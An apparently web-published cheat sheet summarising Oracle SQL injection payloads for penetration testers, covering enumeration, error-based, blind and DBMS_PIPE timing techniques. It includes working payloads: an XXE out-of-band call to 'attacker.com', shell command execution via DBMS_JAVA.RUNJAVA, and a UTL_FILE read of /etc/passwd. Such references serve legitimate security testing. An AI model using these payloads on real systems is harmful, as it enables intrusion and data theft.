# Oracle SQL Specific SQL Injection Payloads: Techniques and Cheat Sheet

> Discover Oracle SQL injection payloads with this cheat sheet covering enumeration, error-based, blind, time-based, OAST, RCE, and file manipulation techniques from Swisskyrepo PayloadsAllTheThings.

- Repository: [Swissky/PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings)
- Tags: cheat-sheet
- Published: 2026-03-01

---

**The swisskyrepo/PayloadsAllTheThings repository maintains a comprehensive collection of Oracle SQL specific SQL injection payloads organized by technique, covering enumeration, error-based extraction, blind boolean tests, time-based delays, out-of-band exfiltration, remote command execution, and file manipulation vectors.**

Penetration testers targeting Oracle databases require specialized syntax that differs significantly from MySQL or Microsoft SQL Server. The `PayloadsAllTheThings` repository centralizes these vectors in `SQL Injection/OracleSQL Injection.md`, providing exact payloads that leverage Oracle-specific system views, packages, and functions to extract data or execute commands.

## Database Enumeration Techniques

Oracle exposes critical metadata through system views like `v$version` and `all_users`. Attackers use these to fingerprint the database and map the schema before exploitation.

### Version and User Fingerprinting

Query the `v$version` view to identify the exact Oracle release and platform:

```sql
SELECT banner FROM v$version WHERE banner LIKE 'Oracle%';

```

List all database accounts accessible to the current session:

```sql
SELECT username FROM all_users;

```

## Error-Based Data Extraction

Oracle error messages reveal query results when specific functions receive malformed input. The `utl_inaddr.get_host_name` function triggers DNS lookup errors that reflect subquery data, while `dbms_xmlgen.getxml` generates parsing errors containing concatenated results.

Use `UTL_INADDR` to leak the database banner through a DNS resolution error:

```sql
SELECT utl_inaddr.get_host_name((select banner from v$version where rownum=1)) FROM dual;

```

Force an XML parsing error to extract the current user via `DBMS_XMLGEN`:

```sql
SELECT to_char(dbms_xmlgen.getxml('select "'||'|| (SELECT user FROM dual) ||'" FROM dual')) FROM dual;

```

## Blind Boolean-Based Detection

When error messages are suppressed, attackers use conditional logic that returns true/false states based on data existence. This technique queries `user_tab_cols` to verify table and column names without direct output.

Test for the existence of a specific table and column combination:

```sql
SELECT COUNT(*) FROM user_tab_cols
WHERE column_name = 'MESSAGE' AND table_name = 'LOG_TABLE';

```

A returned count greater than zero confirms the column exists, allowing binary search enumeration of schema metadata.

## Time-Based Blind Injection

Oracle lacks a native `sleep()` function, but the `DBMS_PIPE` package provides reliable delay mechanisms. The `RECEIVE_MESSAGE` function waits for a pipe message that never arrives, creating a measurable pause.

Introduce a 10-second delay when a condition evaluates to true:

```sql
AND 1337=(CASE WHEN (1=1) THEN DBMS_PIPE.RECEIVE_MESSAGE('DELAY',10) ELSE 1337 END);

```

This payload allows attackers to infer data bit-by-bit through response timing analysis when boolean indicators are unavailable.

## Out-of-Band Data Exfiltration

XML External Entity (XXE) injection forces the Oracle parser to request remote resources, tunneling data via DNS or HTTP requests to attacker-controlled servers. This bypasses firewall restrictions on direct database connections.

Trigger an out-of-band request containing exfiltrated data:

```sql
SELECT EXTRACTVALUE(
  xmltype('<?xml version="1.0"?><!DOCTYPE root [<!ENTITY % remote SYSTEM "http://attacker.com/secret.txt"> %remote;]>'),
  '/l'
) FROM dual;

```

## Operating System Command Execution

Oracle supports Java stored procedures and external procedure calls that enable shell command execution. The `DBMS_JAVA` package and custom `os_command` packages allow arbitrary code execution when the database user possesses requisite privileges.

Execute a system command via the Java wrapper class:

```sql
SELECT DBMS_JAVA.RUNJAVA('oracle/aurora/util/Wrapper /bin/bash -c "id > /tmp/pwn.txt"') FROM dual;

```

## File Read and Write Operations

The `UTL_FILE` package provides native file system access for reading sensitive configuration files or writing web shells. These operations typically require stacked queries or PL/SQL blocks.

Read the first 100 lines of `/etc/passwd` using `UTL_FILE`:

```sql
SELECT utl_file.get_line(utl_file.fopen('/etc','passwd','R'), 100) FROM dual;

```

## Summary

- **Enumeration** relies on `v$version` and `all_users` views to map the database environment.
- **Error-based** techniques use `UTL_INADDR` and `DBMS_XMLGEN` to leak data through forced error messages.
- **Blind detection** employs conditional counts against `user_tab_cols` for inference-based extraction.
- **Time-based** delays utilize `DBMS_PIPE.RECEIVE_MESSAGE` for reliable timing attacks.
- **Out-of-band** exfiltration exploits XML external entities to smuggle data via HTTP/DNS.
- **Command execution** leverages `DBMS_JAVA` or `os_command` packages for operating system access.
- **File manipulation** uses `UTL_FILE` operations within stacked queries to read server files.

## Frequently Asked Questions

### What distinguishes Oracle SQL injection from other database platforms?

Oracle databases utilize proprietary system views (such as `v$version` and `all_users`) and specialized packages (including `UTL_FILE` and `DBMS_PIPE`) that require syntax distinct from MySQL or PostgreSQL. Payloads must account for Oracle's dual-table requirement (`FROM dual`) and specific error message formats.

### How can I fingerprint an Oracle database through injection testing?

Query `SELECT banner FROM v$version` to obtain version strings, or trigger Oracle-specific functions like `utl_inaddr.get_host_name` that produce unique error codes (ORA-29257, ORA-00904) distinguishable from other database systems. The presence of the `dual` table in successful queries also confirms an Oracle backend.

### Is remote command execution possible through Oracle SQL injection?

Yes, when the database user has Java privileges or access to the `DBMS_SCHEDULER` package, attackers can execute shell commands via `DBMS_JAVA.RUNJAVA` or external procedures. The repository documents payloads for both Java-based execution and the `os_command` package approach.

### Which time-based method works best for blind Oracle injection?

`DBMS_PIPE.RECEIVE_MESSAGE` is the most reliable vector, accepting a string identifier and delay value in seconds. Unlike heavy computational queries that may vary in execution time, this function provides consistent, measurable delays for accurate boolean inference.